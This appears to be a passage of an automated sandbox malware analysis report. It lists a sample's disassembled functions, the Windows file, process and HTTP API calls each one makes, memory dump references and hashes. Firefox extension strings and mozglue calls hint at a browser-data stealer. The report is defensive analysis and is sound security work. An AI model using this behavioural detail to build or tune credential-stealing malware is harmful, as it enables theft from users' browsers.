                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F38A6: GetSystemTime.KERNEL32(?,00917807,?), ref: 008F38D5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008EC320
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008EC472
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008EC48D
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008EC4DF
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 211194620-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 47e36b28c7d618974d32fac4c2b22e8a4aa6dbceb95f271bfa391042cb8941c2
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5f25575e21f886763944b9ceb8bde9c237b0ae2a7f9399b037ba24e74c70d0a5
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47e36b28c7d618974d32fac4c2b22e8a4aa6dbceb95f271bfa391042cb8941c2
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF71933290015DABCF10FBAAED469DEBB75FF05305F110421FA00F7262DB71AE568A92
                                                                                                                                                                                                                                                                                                                    Function 008EE401 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E9163
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,008EF752,?,?,?), ref: 008E917A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,008EF752,?,?,?), ref: 008E9191
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E91A8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CloseHandle.KERNEL32(?,?,?,?,?,008EF752,?,?,?), ref: 008E91D0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,008F8680,?), ref: 008F3A93
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,?,00918700,0091796B), ref: 008EE492
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008EE4A5
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                                                                                                                                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                                                                                                                    • API String ID: 161838763-3310892237
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 183029ba531ff80d1c1fad5990eafbbd0cb98df7ca0657f1435ead736793d751
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 942b1be3c14234ae03563e6ba93babf2073de045dd9a6e25caaf50ef9a982a5d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 183029ba531ff80d1c1fad5990eafbbd0cb98df7ca0657f1435ead736793d751
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9441B53290015DABCF10FBBADD429DDBBB4FF49304B510520FE04F7262DA75AE598A92
                                                                                                                                                                                                                                                                                                                    Function 008F858D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008E68F1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: StrCmpCA.SHLWAPI(?), ref: 008E690B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E693A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 008E6979
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E69A9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008E69B4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 008E69D8
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F85C2
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                                                                                                                                                    • String ID: ERROR$ERROR
                                                                                                                                                                                                                                                                                                                    • API String ID: 3086566538-2579291623
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ddb40e6fecd3429a5c943b4b631ca08e27055feb77b6db3f36277c7c45b5ddf7
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9da02ea4607b21255aaef18ebfed613868c56070f02f61d4fba7039c1aade913
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ddb40e6fecd3429a5c943b4b631ca08e27055feb77b6db3f36277c7c45b5ddf7
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82014B71A0015CA7CB20FB7ADC478AD3BA8FF45300B510561BE24E3213EB74AA1586D7
                                                                                                                                                                                                                                                                                                                    Function 008F8BE6 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8,?,?), ref: 008F8C4D
                                                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4198075804-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8386deb373a9e226a9cf1c5cdb7006596210d1af1e3eced8733b76bb9546a219
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 73cd61294b30fb3aee15ed6ba6204576303e27ccf877b5021234c63a934f73b8
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8386deb373a9e226a9cf1c5cdb7006596210d1af1e3eced8733b76bb9546a219
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F21267290010DEBCF10EF69DC458EE7BB8FF51354B004016FA15A7261DB30AA86CBA1
                                                                                                                                                                                                                                                                                                                    Function 008F428C Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,008F67CA), ref: 008F42A6
                                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,008F67CA,008F67CA,00000000,?,?,?,008F67CA), ref: 008F42CD
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,008F67CA), ref: 008F42E4
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1065093856-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ed2c07bbe0cd638e15727188f52199dae2c5713ccd73cf27e76e8644d283a2ab
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ec7ddb2c41bf403752091bffe5f177f2f52053889778ff225470823f173a2c27
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed2c07bbe0cd638e15727188f52199dae2c5713ccd73cf27e76e8644d283a2ab
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65F01D7110011CBFDB116FA5DC86EFB3B5CFB06398F105122FA01D7251D7719D1696A1
                                                                                                                                                                                                                                                                                                                    Function 6C973060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C973095
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9735A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C9FF688,00001000), ref: 6C9735D5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9735A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C9735E0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9735A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C9735FD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9735A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C97363F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9735A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C97369F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9735A0: __aulldiv.LIBCMT ref: 6C9736E4
                                                                                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C97309F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C9956EE,?,00000001), ref: 6C995B85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995B50: EnterCriticalSection.KERNEL32(6C9FF688,?,?,?,6C9956EE,?,00000001), ref: 6C995B90
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995B50: LeaveCriticalSection.KERNEL32(6C9FF688,?,?,?,6C9956EE,?,00000001), ref: 6C995BD8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995B50: GetTickCount64.KERNEL32 ref: 6C995BE4
                                                                                                                                                                                                                                                                                                                    • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C9730BE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9730F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C973127
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9730F0: __aulldiv.LIBCMT ref: 6C973140
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB2A: __onexit.LIBCMT ref: 6C9AAB30
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4291168024-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a89c228e545dd288f330ab736a0b45352c27a36278ea1bf323cfc6a454b8df69
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 42de146e6d6d4090fffa5d769696378318457cbbfffda53b6e1066b83259dcd8
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a89c228e545dd288f330ab736a0b45352c27a36278ea1bf323cfc6a454b8df69
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9F0F922D28B4C97CB10DF74A8411EE73B0AF7B11CF605319E86467651FF20A1D8C396
                                                                                                                                                                                                                                                                                                                    Function 008F3EE1 Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,008F5B27,00000000,?), ref: 008F3F03
                                                                                                                                                                                                                                                                                                                    • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 008F3F1E
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 008F3F25
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3183270410-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 01acb6e0b01cdc7e20217d049b1dd0bd48e367d948a51b94eb5a15e0e00c1438
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b10fad41b91d66e8743c81c3d29a1ba88d559162676957be31ef53e2cc6efc41
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01acb6e0b01cdc7e20217d049b1dd0bd48e367d948a51b94eb5a15e0e00c1438
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF0903160410CBBE720AB68DC45FEEB7B8EB49700F100065BA44E7190CEB0DA858795
                                                                                                                                                                                                                                                                                                                    Function 008F28E1 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
